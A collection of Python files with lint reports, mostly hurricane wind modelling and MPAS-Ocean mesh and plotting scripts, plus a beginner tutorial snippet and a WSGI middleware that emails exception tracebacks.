10 self.deltap = deltap # Pressure difference in millibars.
11 self.vmax = vmax # The maximum gradient wind [ve, vn] in km/hr.
12 self.b = b # The Holland parameter, conventionally in the range [0.5,2.5]
13 self.time = time # Time of this trajectory point in hours.
14 self.ref_time = initial_datetime
15
16
17 def set_vf(self, vf: tuple):
18 self.vforward = vf
| 3 - refactor: too-many-instance-attributes
4 - refactor: too-many-arguments
4 - refactor: too-many-positional-arguments
3 - refactor: too-few-public-methods
|
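A minimal construction sketch for the Hurricane container above, with made-up values; units follow the inline comments (km, km/hr, millibars, hours), and the class is assumed importable:

import datetime

eye = (-1.5, 0.5)  # (lon, lat) in radians, hypothetical
h = Hurricane(eye, extent=300.0, pcentral=950.0, deltap=63.0,
              vmax=180.0, b=1.2, time=0.0,
              initial_datetime=datetime.datetime(2021, 8, 1))
h.set_vf((10.0, 5.0))  # forward velocity [ve, vn] in km/hr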
1 from geopy.distance import geodesic
2 from utils.gis import geodistkm
3
4 def test_gis():
5 albuquerque = [35.0844, -106.6504] #(lat,lon)
6 los_alamos = [35.8800, -106.3031] #(lat,lon)
7
8 result1 = geodesic(albuquerque,los_alamos).km
9 result2 = geodistkm(albuquerque[1],albuquerque[0],los_alamos[1],los_alamos[0])
10
11 assert result1 == result2
| Clean Code: No Issues Detected
|
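test_gis above asserts exact equality between two independent geodesic implementations, which is fragile for floating-point results; a hedged variant using a relative tolerance (pytest.approx would also work):

import math
assert math.isclose(result1, result2, rel_tol=1e-9)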
1 #!/usr/bin/env python
2 """
3 % Create cell width array for this mesh on a regular latitude-longitude grid.
4 % Outputs:
5 % cellWidth - m x n array, entries are desired cell width in km
6 % lat - latitude, vector of length m, with entries between -90 and 90, degrees
7 % lon - longitude, vector of length n, with entries between -180 and 180, degrees
8 """
9 import numpy as np
10 import jigsaw_to_MPAS.mesh_definition_tools as mdt
11
12
13 def cellWidthVsLatLon():
14 lat = np.arange(-90, 90.01, 0.1)
15 lon = np.arange(-180, 180.01, 0.1)
16
17 QU1 = np.ones(lat.size)
18 EC60to30 = mdt.EC_CellWidthVsLat(lat)
19 RRS30to6 = mdt.RRS_CellWidthVsLat(lat, 30, 6)
20
21 AtlNH = RRS30to6
22 AtlGrid = mdt.mergeCellWidthVsLat(lat, EC60to30, AtlNH, 0, 4)
23
24 PacNH = mdt.mergeCellWidthVsLat(lat, 30 * QU1, RRS30to6, 50, 12)
25 PacGrid = mdt.mergeCellWidthVsLat(lat, EC60to30, PacNH, 0, 6)
26
27 cellWidth = mdt.AtlanticPacificGrid(lat, lon, AtlGrid, PacGrid)
28
29 import matplotlib.pyplot as plt
30 import matplotlib
31 matplotlib.use('Agg')
32 plt.clf()
33 plt.plot(lat, AtlGrid, label='Atlantic')
34 plt.plot(lat, PacGrid, label='Pacific')
35 plt.grid(True)
36 plt.xlabel('latitude')
37 plt.title('Grid cell size, km')
38 plt.legend()
39 plt.savefig('cellWidthVsLat.png')
40
41 return cellWidth, lon, lat
| Clean Code: No Issues Detected
|
1 #!/usr/bin/env python
2 """
3
4 Tidal channel comparison between MPAS-O and the analytical forcing result.
5
6 Phillip J. Wolfram
7 04/12/2019
8
9 """
10
11 import numpy as np
12 import xarray as xr
13 import matplotlib.pyplot as plt
14
15 # render statically by default
16 plt.switch_backend('agg')
17
18 # analytical case
19 x = np.linspace(0,24,100)
20 y = np.sin(x*2*np.pi/24)
21 plt.plot(x,y, lw=3, color='black', label='analytical')
22
23 # data from MPAS-O on boundary
24 ds = xr.open_mfdataset('output.nc')
25 mask = ds.where(ds.yCell.values.min() == ds.yCell)
26 mask.ssh.mean('nCells').plot(marker='o', label='MPAS-O')
27
28 plt.legend()
29 plt.ylabel('ssh amplitude (m)')
30 plt.xlabel('Time (min)')
31
32 plt.savefig('tidalcomparison.png')
| Clean Code: No Issues Detected
|
1 import json
2 from netCDF4 import Dataset
3 import numpy as np
4 import math
5 from hurricane_model import hurricane
6 from structures import geogrid
7 import datetime
8
9 def read_grid_file(grid_filename: str, grid_flag: int) -> (float, float):
10 if grid_flag == 1:
11 xll, yll, cellsize, numcells_lat, numcells_lon = read_raster_inputs(grid_filename)
12 lon, lat = setup_regular_grid(xll, yll, cellsize, numcells_lat, numcells_lon)
13 else:
14 lon, lat = read_netcdf(grid_filename)
15
16 return lon, lat
17
18 def read_input_file(filename: str) -> (str, int, str, float, float):
19 try:
20 f = open(filename, "r")
21 except FileNotFoundError as fnf_error:
22 raise fnf_error
23
24 traj_filename = f.readline().rstrip('\n')
25 grid_flag = f.readline().rstrip('\n').split()
26 grid_flag = int(grid_flag[0])
27 grid_filename = f.readline().rstrip('\n')
28 ambient_pressure = f.readline().rstrip('\n').split()
29 ambient_pressure = float(ambient_pressure[0])
30 holland_b_param = f.readline().rstrip('\n').split()
31 holland_b_param = float(holland_b_param[0])
32
33 f.close()
34
35 return traj_filename, grid_flag, grid_filename, ambient_pressure, holland_b_param
36
37
38 def setup_regular_grid(xll: float, yll: float, cellsize: float, numcells_lat: int, numcells_lon: int) -> (float, float):
39 npoints = numcells_lat * numcells_lon
40 lon = np.zeros((npoints, ))
41 lat = np.zeros((npoints, ))
42 k = 0
43 for i in range(0, numcells_lon):
44 for j in range(0, numcells_lat):
45 lon[k] = xll + (float(i) + 0.5) * cellsize
46 lat[k] = yll + (float(j) + 0.5) * cellsize
47 k += 1
48
49 lat = lat * math.pi / 180. # Convert to radians
50 lon = lon * math.pi / 180. # Convert to radians
51
52 return lon, lat
53
54
55 def read_raster_inputs(filename: str) -> (float, float, float, int, int):
56 try:
57 f = open(filename, "r")
58 except FileNotFoundError as fnf_error:
59 raise fnf_error
60
61 # longitude of the south west corner in deg
62 temp = f.readline().rstrip('\n').split()
63 xll = float(temp[0])
64 # latitude of the south west corner in deg
65 temp = f.readline().rstrip('\n').split()
66 yll = float(temp[0])
67 # cell size in deg
68 temp = f.readline().rstrip('\n').split()
69 cellsize = float(temp[0])
70 # number of cells for latitude
71 temp = f.readline().rstrip('\n').split()
72 numcells_lat = int(temp[0])
73 # number of cells for longitude
74 temp = f.readline().rstrip('\n').split()
75 numcells_lon = int(temp[0])
76
77 f.close()
78
79 return xll, yll, cellsize, numcells_lat, numcells_lon
80
81
82 def read_json(filename: str):
83 try:
84 with open(filename) as json_data:
85 json_raw = json.load(json_data)
86 return json_raw
87
88 except FileNotFoundError as fnf_error:
89 raise fnf_error
90
91
92 def read_netcdf(filename: str) -> (float, float):
93 # http://unidata.github.io/netcdf4-python/#section1
94 # lat and lon from the netCDF file are assumed in radians
95 try:
96 nc = Dataset(filename)
97 temp_lat = nc.variables['latCell'][:]
98 temp_lon = nc.variables['lonCell'][:]
99
100 # Convert to numpy array for subsequent processing
101 lat = np.array(temp_lat)
102 lon = np.array(temp_lon) - 2. * math.pi
103 for i in range(0, len(lon)):
104 if lon[i] <= -math.pi:
105 lon[i] += 2. * math.pi
106
107 return lon, lat
108
109 except FileNotFoundError as fnf_error:
110 raise fnf_error
111
112
113 def initialize_hurricane(traj_filename: str, ambient_pressure: float, holland_b_param: float) -> list:
114 # JSON Specs
115 # "timeUnits": "hours",
116 # "distanceUnits": "miles",
117 # "windspeedUnits": "knots",
118 # "pressureUnits": "mb",
119
120 json_raw = read_json(traj_filename)
121
122 ref_date = datetime.datetime.strptime(json_raw['initialTime'],'%Y-%m-%d_%H:%M:%S')
123
124 curr_hurricane = []
125 traj = json_raw['stormTrack']['features']
126
127 for it in range(0, len(traj)):
128 coord = traj[it]['geometry']['coordinates']
129 center_coord = [x * math.pi / 180. for x in coord] # degree to rad
130 extent = traj[it]['properties']['rMax'] * 1.60934 # miles to km
131 pmin = traj[it]['properties']['minP'] # in mbar
132 deltap = ambient_pressure - pmin # in mbar
133 time = traj[it]['properties']['time'] # in hrs
134 vmax = traj[it]['properties']['wMax'] * 1.852 # from knots to km/h
135
136 curr_hurricane.append(hurricane.Hurricane(tuple(center_coord), extent, pmin, deltap, vmax,
137 holland_b_param, time, ref_date))
138
139 # Compute the components of the forward velocity
140 for it in range(0, len(traj) - 1):
141 x1 = curr_hurricane[it].center[0]
142 y1 = curr_hurricane[it].center[1]
143
144 x2 = curr_hurricane[it + 1].center[0]
145 y2 = curr_hurricane[it + 1].center[1]
146
147 theta = math.atan2(y2 - y1, x2 - x1)
148 vf = traj[it]['properties']['vf'] * 1.852
149 curr_hurricane[it].set_vf((vf * math.cos(theta), vf * math.sin(theta)))
150
151 return curr_hurricane
152
153
154 def initialize_grid(grid_filename: str, grid_flag: int) -> geogrid.GeoGrid:
155 lon, lat = read_grid_file(grid_filename, grid_flag)
156 return geogrid.GeoGrid(lon, lat)
| 20 - warning: unspecified-encoding
20 - refactor: consider-using-with
57 - warning: unspecified-encoding
57 - refactor: consider-using-with
84 - warning: unspecified-encoding
113 - refactor: too-many-locals
|
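read_input_file above consumes a fixed five-line plain-text file: trajectory filename, grid flag (1 selects the regular raster grid, anything else a netCDF mesh), grid filename, ambient pressure in millibars, and the Holland b parameter. A hypothetical example of that layout:

trajectory.json
1
raster_grid.txt
1013.25
1.2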
1 from winds.wind_model import PROFILE_TYPE
2 from winds.parameters import Parameters
3 import math
4
5 def test_parameters():
6 gridsize = [10, 10]
7 nr = 100
8 wind_profile_type = PROFILE_TYPE.HOLLAND
9 grid_position = [-106.0,35.0]
10 cellsize = 2.0
11 siderealDay = 23.934 # A sidereal day in hrs.
12 omega = 2.0 * math.pi / siderealDay # The Earth's rotation rate in rad/hr.
13 rho = 1.225e9 # Air density at sea level in kg/km^3 (i.e. 1.225 kg/m^3).
14 distance_unit = 'kilometers'
15 time_unit = 'hours'
16 pressure_unit = 'millibars'
17 # The Coriolis parameter should be 2*omega*sin(pi*|phi|/360), for phi in degrees latitude [-90,90].
18
19 params = Parameters(gridsize,nr,wind_profile_type)
20
21
22
23 def eval_coriolis(lat,omega):
24 return 2*omega * math.sin(math.pi*math.fabs(lat)/360)
| 9 - warning: unused-variable
10 - warning: unused-variable
12 - warning: unused-variable
13 - warning: unused-variable
14 - warning: unused-variable
15 - warning: unused-variable
16 - warning: unused-variable
19 - warning: unused-variable
|
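A quick usage sketch for eval_coriolis above. Note the convention coded there (and in the preceding comment) takes sin(pi*|phi|/360), the sine of half the latitude, so the value below follows that convention rather than the textbook 2*omega*sin(phi):

import math

siderealDay = 23.934                 # sidereal day in hours
omega = 2.0 * math.pi / siderealDay  # Earth's rotation rate in rad/hr
f = eval_coriolis(35.0, omega)       # ~0.158 rad/hr under this convention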
1 import matplotlib
2 matplotlib.use('Agg')
3 import matplotlib.pyplot as plt
4 from netCDF4 import Dataset
5 import numpy
6
7 fig = plt.gcf()
8 fig.set_size_inches(8.0,10.0)
9 nRow=1 #6
10 nCol=2
11 nu=['0.01','0.1','1','10','100','1000']
12 iTime=[3,6]
13 time=['3 hrs','6 hrs']
14 for iRow in range(nRow):
15 ncfile = Dataset('output_'+str(iRow+1)+'.nc','r')
16 var = ncfile.variables['temperature']
17 xtime = ncfile.variables['xtime']
18 for iCol in range(nCol):
19 plt.subplot(nRow, nCol, iRow*nCol+iCol+1)
20 ax = plt.imshow(var[iTime[iCol],0::4,:].T,extent=[0,200,2000,0],aspect=2)
21 plt.clim([10,20])
22 plt.jet()
23 if iRow==nRow-1:
24 plt.xlabel('x, km')
25 if iCol==0:
26 plt.ylabel('depth, m')
27 plt.colorbar()
28 #print(xtime[iTime[iCol],11:13])
29 plt.title('time='+time[iCol]+', nu='+nu[iRow])
30 ncfile.close()
31 plt.savefig('sections_overflow.png')
| 5 - warning: unused-import
|
1 import numpy
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 4
9 nCol = 2
10 nu = ['0.01', '1', '15', '150']
11 iTime = [1, 2]
12 time = ['day 10', 'day 20']
13
14 fig, axs = plt.subplots(nRow, nCol, figsize=(
15 4.0 * nCol, 3.7 * nRow), constrained_layout=True)
16
17 for iRow in range(nRow):
18 ncfile = Dataset('output_' + str(iRow + 1) + '.nc', 'r')
19 var = ncfile.variables['temperature']
20 xtime = ncfile.variables['xtime']
21 for iCol in range(nCol):
22 ax = axs[iRow, iCol]
23 dis = ax.imshow(var[iTime[iCol], 0::4, :].T, extent=[
24 0, 250, 500, 0], aspect='0.5', cmap='jet', vmin=10, vmax=20)
25 if iRow == nRow - 1:
26 ax.set_xlabel('x, km')
27 if iCol == 0:
28 ax.set_ylabel('depth, m')
29 if iCol == nCol - 1:
30 fig.colorbar(dis, ax=axs[iRow, iCol], aspect=10)
31 ax.set_title(time[iCol] + ", " + r"$\nu_h=$" + nu[iRow])
32 ncfile.close()
33
34 plt.savefig('sections_internal_waves.png')
| 1 - warning: unused-import
|
1 import netCDF4
2 import numpy as np
3 import hurricane_model as Hurricane
4 import structures as Geogrid
5 import winds_io as WindModel
6 import matplotlib.pyplot as plt
7 import datetime
8
9 def write_netcdf(filename: str, curr_hurricane: Hurricane, grid: Geogrid, winds: WindModel):
10 # http://unidata.github.io/netcdf4-python/#section1
11 rootgrp = netCDF4.Dataset(filename, "w", format="NETCDF3_64BIT_OFFSET")
12
13 # Declare dimensions
14 rootgrp.createDimension('nCells',grid.ncells)
15 rootgrp.createDimension('StrLen',64)
16 rootgrp.createDimension('Time',None)
17
18 # Declare variables
19 time = rootgrp.dimensions['Time'].name
20 ncells = rootgrp.dimensions['nCells'].name
21 time_var = rootgrp.createVariable('xtime','S1',('Time','StrLen'))
22 u_var = rootgrp.createVariable('windSpeedU',np.float64,(time,ncells))
23 v_var = rootgrp.createVariable('windSpeedV',np.float64,(time,ncells))
24 pres_var = rootgrp.createVariable('atmosPressure',np.float64,(time,ncells))
25
26 # Format time
27 ref_date = curr_hurricane[0].ref_time
28 xtime = []
29 for it in range(0,len(curr_hurricane)):
30 t = curr_hurricane[it].time
31 date = ref_date + datetime.timedelta(hours=np.float64(t))
32 xtime.append(date.strftime('%Y-%m-%d_%H:%M:%S'+45*' '))
33 xtime = np.asarray(xtime)
34 xtime_list = []
35 for t in xtime:
36 xtime_list.append(list(t))
37 time_var[:] = xtime_list
38
39 # Assign variables
40 kmh_to_mps = 0.277778
41 mbar_to_pa = 100.0
42 for it in range(0, len(curr_hurricane)-1):
43 u_var[it, :] = winds[it].u * kmh_to_mps
44 v_var[it, :] = winds[it].v * kmh_to_mps
45 pres_var[it, :] = winds[it].pressure_profile * mbar_to_pa
46
47 # Close
48 rootgrp.close()
| 30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
36 - warning: bad-indentation
9 - refactor: too-many-locals
6 - warning: unused-import
|
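write_netcdf above stores timestamps as fixed-width character arrays: an 'S1' variable over (Time, StrLen), filled one character per slot. A standalone sketch of that pattern, with a hypothetical filename:

import netCDF4

nc = netCDF4.Dataset('example.nc', 'w', format='NETCDF3_64BIT_OFFSET')
nc.createDimension('Time', None)
nc.createDimension('StrLen', 64)
xtime = nc.createVariable('xtime', 'S1', ('Time', 'StrLen'))
stamp = '2021-08-01_00:00:00'.ljust(64)  # pad to the fixed StrLen width
xtime[0, :] = list(stamp)                # one character per slot, as above
nc.close()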
1 import numpy as np
2 import math
3
4 class RadialProfile():
5
6 def __init__(self,n,extent):
7 self.profile = np.zeros(n,dtype=np.float64)
8 self.rvals = np.zeros(n,dtype=np.float64)
9 self.n = n
10 self.extent = extent
11 self.dr = extent/(n-1)
12 for i in range(0,n):
13 self.rvals[i] = i*self.dr
14
15 def getValue(self,r):
16 if r<0 or r>self.extent:
17 return 0.0
18 else:
19 k = int(r/self.dr)
20 return self.rvals[k]
21
22 class PressureProfile(RadialProfile):
23 def __init__(self,n,extent,pcentral,deltap,rmax):
24 super().__init__(n,extent)
25 self.pcentral = pcentral
26 self.deltap = deltap
27 self.rmax = rmax
28
29 class HollandPressureProfile(PressureProfile):
30 def __init__(self,n,extent,pcentral,deltap,rmax,b):
31 super().__init__(n,extent,pcentral,deltap,rmax)
32 self.b = b
33 for i in range(0,self.n):
34 r = self.rvals[i]
35 if r>0:
36 p = self.pcentral + self.deltap*math.exp(-pow(self.rmax/r,b))
37 else:
38 p = pcentral
39 self.profile[i] = p
40
41 class WindSpeedProfile(RadialProfile):
42 def __init__(self,n,extent,rmax):
43 super().__init__(n,extent)
44 self.rmax = rmax
45 self.vmax = 0
46
47 def getVmax(self):
48 if self.vmax==0:
49 for i in range(0,self.n):
50 self.vmax = max(self.vmax,self.profile[i])
51 return self.vmax
52
53 class HollandWindSpeedProfile(WindSpeedProfile):
54 def __init__(self,n,extent,rmax,deltap,rho,f,b,coriolis=False):
55 super().__init__(n,extent,rmax)
56 self.units_factor = 100 # To convert the leading term to m/s
57 # This factor comes from adopting millibars instead of Pascals, and km/hr instead of m/s.
58 self.deltap = deltap
59 self.rho = rho
60 self.f = f
61 self.b = b
62 for i in range(0,self.n):
63 r = self.rvals[i]
64 if r>0:
65 y = pow(rmax/r,b)
66 exp_term = self.units_factor*(deltap/rho)*b*y*math.exp(-y)
67 if coriolis == True:
68 v = math.sqrt(exp_term + 0.25*pow(r,2)*pow(f,2))+0.5*r*f
69 else:
70 v = math.sqrt(exp_term)
71 else:
72 v = 0.0
73 self.profile[i] = v * 3.6 # to convert to km/h
| 16 - refactor: no-else-return
4 - refactor: too-few-public-methods
23 - refactor: too-many-arguments
23 - refactor: too-many-positional-arguments
22 - refactor: too-few-public-methods
30 - refactor: too-many-arguments
30 - refactor: too-many-positional-arguments
29 - refactor: too-few-public-methods
54 - refactor: too-many-arguments
54 - refactor: too-many-positional-arguments
|
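In HollandWindSpeedProfile above, at r = rmax the exponent y = (rmax/r)^b equals 1, so without the Coriolis term the stored speed reduces to sqrt(units_factor*(deltap/rho)*b*exp(-1))*3.6. A quick check with made-up parameters in the module's units:

import math

deltap, rho, b = 60.0, 1.15, 1.2  # hypothetical: millibars, kg/m^3, dimensionless
units_factor = 100                # millibars -> Pascals, as in the class above
v_mps = math.sqrt(units_factor * (deltap / rho) * b * math.exp(-1.0))
print(v_mps * 3.6)                # km/hr, matching profile[i] at r = rmax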
1 # Author: Steven Brus
2 # Date: April, 2020
3 # Description: Plots synthetic wind/pressure timeseries on the MPAS-O mesh
4
5 import netCDF4
6 import matplotlib.pyplot as plt
7 import numpy as np
8 import os
9 import cartopy
10 import cartopy.crs as ccrs
11 import cartopy.feature as cfeature
12 plt.switch_backend('agg')
13 cartopy.config['pre_existing_data_dir'] = \
14 os.getenv('CARTOPY_DIR', cartopy.config.get('pre_existing_data_dir'))
15
16 #######################################################################
17 #######################################################################
18
19 def plot_data(lon_grid,lat_grid,data,var_label,var_abrev,time):
20
21 fig = plt.figure()
22 ax1 = fig.add_subplot(1,1,1,projection=ccrs.PlateCarree())
23 levels = np.linspace(np.amin(data),np.amax(data),100)
24 cf = ax1.tricontourf(lon_grid,lat_grid,data,levels=levels,transform=ccrs.PlateCarree())
25 ax1.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
26 ax1.add_feature(cfeature.LAND, zorder=100)
27 ax1.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
28 ax1.add_feature(cfeature.COASTLINE, zorder=101)
29 ax1.set_title('interpolated data '+time.strip())
30 cbar = fig.colorbar(cf,ax=ax1)
31 cbar.set_label(var_label)
32
33 # Save figure
34 fig.tight_layout()
35 fig.savefig(var_abrev+'_'+str(i).zfill(4)+'.png',bbox_inches='tight')
36 plt.close()
37
38 #######################################################################
39 #######################################################################
40
41 if __name__ == '__main__':
42
43 grid_file = 'mesh.nc'
44 data_file = 'out.nc'
45
46 grid_nc = netCDF4.Dataset(grid_file,'r')
47 lon_grid = grid_nc.variables['lonCell'][:]*180.0/np.pi
48 lat_grid = grid_nc.variables['latCell'][:]*180.0/np.pi
49
50 data_nc = netCDF4.Dataset(data_file,'r')
51 u_data = data_nc.variables['windSpeedU'][:]
52 v_data = data_nc.variables['windSpeedV'][:]
53 p_data = data_nc.variables['atmosPressure'][:]
54 xtime = data_nc.variables['xtime'][:]
55
56 for i in range(u_data.shape[0]-1):
57
58 print('Plotting vel: '+str(i))
59
60 data = np.sqrt(np.square(u_data[i,:]) + np.square(v_data[i,:]))
61 time_ls = [x.decode("utf-8") for x in xtime[i]]
62 time = ''.join(time_ls)
63 plot_data(lon_grid,lat_grid,data,'velocity magnitude','vel',time)
64 plot_data(lon_grid,lat_grid,p_data[i,:],'atmospheric pressure','pres',time)
| 21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
56 - warning: bad-indentation
58 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
19 - refactor: too-many-arguments
19 - refactor: too-many-positional-arguments
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
35 - error: used-before-assignment
|
1 #!/usr/bin/env python
2 '''
3 name: define_base_mesh
4 authors: Phillip J. Wolfram
5
6 This function specifies the resolution for a coastal refined mesh for the CA coast from SF to LA for
7 Chris Jeffrey and Mark Galassi.
8 It contains the following resolution regions:
9 1) a QU 120km global background resolution
10 2) 3km refinement region along the CA coast from SF to LA, with 30km transition region
11
12 '''
13 import numpy as np
14 import jigsaw_to_MPAS.coastal_tools as ct
15
16
17 def cellWidthVsLatLon():
18 km = 1000.0
19
20 params = ct.default_params
21
22 SFtoLA = {"include": [np.array([-124.0, -117.5, 34.2, 38.0])], # SF to LA
23 "exclude": [np.array([-122.1, -120.8, 37.7, 39.2])]} # SF Bay Delta
24
25 WestCoast = np.array([-136.0, -102.0, 22.0, 51])
26
27 print("****QU120 background mesh and 300m refinement from SF to LA****")
28 params["mesh_type"] = "QU"
29 params["dx_max_global"] = 120.0 * km
30 params["region_box"] = SFtoLA
31 params["plot_box"] = WestCoast
32 params["dx_min_coastal"] = 3.0 * km
33 params["trans_width"] = 100.0 * km
34 params["trans_start"] = 30.0 * km
35
36 cell_width, lon, lat = ct.coastal_refined_mesh(params)
37
38 return cell_width / 1000, lon, lat
| Clean Code: No Issues Detected
|
1 import math
2
3
4 class Velocities:
5
6 def __init__(self, vfe, vfn, vmax):
7 """
8 Initialize with the forward velocity components.
9 :param vfe: Eastward forward velocity (x-component in the Earth frame) in km/hr.
10 :param vfn: Northward forward velocity component (y-component in the Earth frame) in km/hr.
11 """
12 self.vf = []
13 self.vfmagn = []
14 self.xunitv = []
15 self.yunitv = []
16
17 self.set_vforward(vfe, vfn)
18 self.vmax = vmax
19
20 def set_vforward(self, vfe, vfn):
21 self.vf = [vfe, vfn]
22 self.vfmagn = math.sqrt(pow(vfe, 2) + pow(vfn, 2))
23 self.xunitv = [vfn/self.vfmagn, -vfe/self.vfmagn]
24 self.yunitv = [vfe/self.vfmagn, vfn/self.vfmagn]
25
26
27 def compute_wind_vector(self, vg, xe, yn):
28 """
29 Returns the velocity components [ve,vn] given the tangential gradient wind speed.
30 :param vg: The tangential (theta) gradient wind speed in the hurricane frame in km/hr.
31 :param xe: The eastern component of position relative to the local origin (the hurricane eye) in km.
32 :param yn: The northern component of position relative to the local origin (the hurricane eye) in km.
33 :return: [ve,vn] the eastward and northward components of the wind velocity in the Earth frame in km/hr.
34 """
35 rmagn = math.sqrt(xe*xe + yn*yn)
36
37 costheta = (xe*self.xunitv[0] + yn*self.xunitv[1])/rmagn
38 sintheta = -(xe*self.xunitv[1] - yn*self.xunitv[0])/rmagn
39 theta_unitv = [-sintheta*self.xunitv[0]+costheta*self.yunitv[0],
40 -sintheta*self.xunitv[1]+costheta*self.yunitv[1]]
41 vgtheta = [theta_unitv[0]*vg, theta_unitv[1]*vg]
42 vfcorr = vg/self.vmax
43 ve = self.vf[0]*vfcorr + vgtheta[0]
44 vn = self.vf[1]*vfcorr + vgtheta[1]
45
46 return [ve, vn]
47
| Clean Code: No Issues Detected
|
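A usage sketch for Velocities above (note its constructor takes vmax, unlike the two-argument call in the earlier test file). For a point due north of the eye under eastward forward motion, the tangential term points west, consistent with counterclockwise circulation:

veloc = Velocities(vfe=20.0, vfn=0.0, vmax=150.0)         # hypothetical km/hr values
v = veloc.compute_wind_vector(vg=100.0, xe=0.0, yn=50.0)  # 50 km north of the eye
print(v)  # roughly [-86.7, 0.0]: westward gradient wind plus scaled forward motion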
1 name = "Tatiana"
2 print(name)
3
4 if 3 > 2:
5 print("It works!")
6 if 5 > 2:
7 print("5 is indeed greater than 2")
8 else:
9 print("5 is not greater than 2")
10 name = 'Tatiana'
11 if name == 'Ola':
12 print('Hey Ola!')
13 elif name == 'Tatiana':
14 print('Hey Tatiana!')
15 else:
16 print('Hey anonymous!')
17
18 def hi():
19 print('Hi there!')
20 print('How are you?')
21 hi ()
22 def hi(name):
23 print('Hi ' + name + '!')
24
25 hi("Tatiana")
26
| 5 - warning: bad-indentation
7 - warning: bad-indentation
9 - warning: bad-indentation
10 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
4 - refactor: comparison-of-constants
6 - refactor: comparison-of-constants
22 - error: function-redefined
22 - warning: redefined-outer-name
|
1 import sys
2 from wsgiref.simple_server import make_server
3
4 sys.path.append('..')
5
6 from app import App
7 from smoke.exceptions import EmailExceptionMiddleware
8
9 def exception_func_1():
10 return exception_func_2()
11
12 def exception_func_2():
13 return exception_func_3()
14
15 def exception_func_3():
16 return 1 / 0
17
18
19 app = EmailExceptionMiddleware(
20 App(exception_func_1),
21 smoke_html=True,
22 to_address=[],
23 smtp_server='127.0.0.1'
24 )
25
26
27 server = make_server('127.0.0.1', 8000, app)
28 server.serve_forever()
| Clean Code: No Issues Detected
|
1 # -*- coding: utf-8 -*-
2
3
4 import sys
5 import traceback
6
7 class ExceptionMiddleware(object):
8 def __init__(self, wrap_app, smoke_html=False):
9 self.wrap_app = wrap_app
10 self.smoke_html = smoke_html
11
12 def __call__(self, environ, start_response):
13 try:
14 return self.wrap_app(environ, start_response)
15 except:
16 tb_exc = traceback.format_exc()
17 exc_info = sys.exc_info()
18 self.handle_exception(tb_exc, exc_info)
19 if not self.smoke_html:
20 raise
21
22 status = '500 Internal Server Error'
23 start_response(
24 status,
25 [('Content-Type', 'text/html')],
26 exc_info
27 )
28 tb_exc = tb_exc.replace('\n', '<br/>').replace(' ', '&nbsp;')
29 html = """<html>
30 <head><title>%s</title></head>
31 <body>
32 <h1>%s</h1>
33 <p>%s</p>
34 </body>
35 </html>
36 """ % (status, status, tb_exc)
37 return [html]
38
39 def handle_exception(self, tb_exc, exc_info):
40 raise NotImplementedError
41
42
43
44 class EmailExceptionMiddleware(ExceptionMiddleware):
45 """This is an Example, In production, It's better not send emails in sync mode.
46 Because sending emails maybe slow, this will block your web app.
47 So, the best practices is write your own EmailExceptionMiddleware,
48 In this class, It's handle_exception method not send mail directly,
49 You shoul use MQ, or something else.
50 """
51 def __init__(self,
52 wrap_app,
53 smoke_html=False,
54 from_address=None,
55 to_address=None,
56 smtp_server=None,
57 smtp_port=25,
58 smtp_username=None,
59 smtp_password=None,
60 mail_subject_prefix=None,
61 mail_template=None):
62 assert isinstance(to_address, (list, tuple)) and smtp_server is not None, "Email Config Error"
63 self.from_address = from_address
64 self.to_address = to_address
65 self.smtp_server = smtp_server
66 self.smtp_port = smtp_port
67 self.smtp_username = smtp_username
68 self.smtp_password = smtp_password
69 self.mail_subject_prefix = mail_subject_prefix
70 self.mail_template = mail_template
71
72 super(EmailExceptionMiddleware, self).__init__(wrap_app, smoke_html=smoke_html)
73
74
75 def handle_exception(self, tb_exc, exc_info):
76 from smoke.functional import send_mail
77 send_mail(
78 self.smtp_server,
79 self.smtp_port,
80 self.smtp_username,
81 self.smtp_password,
82 self.from_address,
83 self.to_address,
84 '{0} Error Occurred'.format(self.mail_subject_prefix if self.mail_subject_prefix else ''),
85 tb_exc,
86 'html'
87 )
88
| 7 - refactor: useless-object-inheritance
15 - warning: bare-except
44 - refactor: too-many-instance-attributes
51 - refactor: too-many-arguments
51 - refactor: too-many-positional-arguments
72 - refactor: super-with-arguments
44 - refactor: too-few-public-methods
|
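The docstring above warns against sending mail synchronously; a hedged sketch of the suggested pattern, where handle_exception only enqueues and a separate worker (thread, process, or MQ consumer) does the actual sending:

import queue

error_queue = queue.Queue()

class QueuedEmailExceptionMiddleware(ExceptionMiddleware):
    def handle_exception(self, tb_exc, exc_info):
        # Hand the traceback off the request path; a worker drains the queue.
        error_queue.put(tb_exc)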
1 from mail import send_mail
| 1 - warning: unused-import
|
1 class App(object):
2 def __init__(self, hook_func=None):
3 self.hook_func = hook_func
4
5 def __call__(self, environ, start_response):
6 html = """<html>
7 <body><table>{0}</table></body>
8 </html>"""
9
10 def _get_env(k, v):
11 return """<tr><td>{0}</td><td>{1}</td></tr>""".format(k, v)
12
13 env_table = ''.join( [_get_env(k, v) for k, v in sorted(environ.items())] )
14 html = html.format(env_table)
15
16 status = '200 OK'
17 headers = [
18 ('Content-Type', 'text/html'),
19 ('Content-Length', str(len(html)))
20 ]
21
22 start_response(status, headers)
23 if self.hook_func:
24 self.hook_func()
25 return [html]
26
27 if __name__ == '__main__':
28 from wsgiref.simple_server import make_server
29 app = App()
30 server = make_server('127.0.0.1', 8000, app)
31 server.handle_request()
| 1 - refactor: useless-object-inheritance
